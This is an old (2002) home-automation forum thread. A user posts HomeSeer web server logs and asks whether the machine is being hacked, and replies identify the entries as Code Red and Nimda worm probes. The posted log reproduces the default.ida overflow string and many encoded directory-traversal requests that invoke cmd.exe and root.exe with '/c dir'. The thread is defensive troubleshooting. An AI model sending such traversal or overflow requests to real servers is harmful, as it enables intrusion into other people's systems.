Announcement

Collapse
No announcement yet.

Errors in log, trying to hack my machine ?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • srodgers
    replied
    I agree with Hunter. Those cmd.exe attempts are the classic sig of NIMBA/Code Red or variant trying to replicate but failing. My firewall has lots of these type entries. Keep Anti-virus updated and windows updates and should not be a problem.

    Leave a comment:


  • DSteiNeuro
    replied
    I dd an IP WhoIs on the IPs http://www.dslreports.com/whois

    Looks like one is in Morocco and the other Korea. Definitely not the neighbor kid on the cable network.

    I would run a run a virus program, change your HS password to something complex, and put up a good firewall. Also check for a Trojan.

    My configuration in my profile

    Leave a comment:


  • Skibum
    replied
    Another obvious thing is that both of these addresses seem to have your password, as they are authorized logons.

    Change your password to something a little more cryptic.

    Skibum
    Skibumsplace

    Leave a comment:


  • Hunter Green
    replied
    That long string of Ns makes me wonder if at least one of those attacks isn't a worm (something like Code Red) trying to replicate itself onto your machine (and failing) rather than a person running hacking scripts against you.

    Nucleus Home Automation

    Leave a comment:


  • PaulVerjans
    Guest replied
    [img]/infopop/emoticons/icon_eek.gif[/img] Yep someone is definitely trying to get into your machine. A quick check on the 2 IPs in your log reveals that the 211... is coming from Korea some research park over there and the 62.. one is from an institute in Rabat Marocco ..

    Are you running your server on port 80 .. I would suggest to run in on another port like 81 or even 8181 or something similar.

    Good luck ..

    Leave a comment:


  • Simonk
    started a topic Errors in log, trying to hack my machine ?

    Errors in log, trying to hack my machine ?

    Can you tell me what the above errors in my HS log could mean ? I can't see that any of my pages would be making these calls to pages that don't exist.
    Is someone trying to hack into my machine

    12/05/2002 03:11:02~!~Info~!~ Web Server authorized local login successful from: 211.171.203.197
    12/05/2002 03:11:02~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%090 %858%bd3%801%090%858%bd3%801%090%858%bd3%801%090%090%190%0c3 %003%b00%31b%3ff%078%000%0=a
    12/05/2002 06:52:15~!~Info~!~ Web Server authorized local login successful from: 62.251.136.185
    12/05/2002 06:52:15~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/root.exe?/c dir
    12/05/2002 06:52:16~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/MSADC/root.exe?/c dir
    12/05/2002 06:52:16~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/c/winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:17~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/d/winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:18~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:19~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:20~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:24~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:24~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..Á../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:25~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..À/../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:25~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..À¯../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:26~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:27~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:27~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:28~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..%5c../winnt/system32/cmd.exe?/c dir
    12/05/2002 06:52:29~!~Error~!~Web Server Error 404, cannot serve file: C:\Program Files\HomeSeer\html/scripts/..%2f../winnt/system32/cmd.exe?/c dir
Working...
X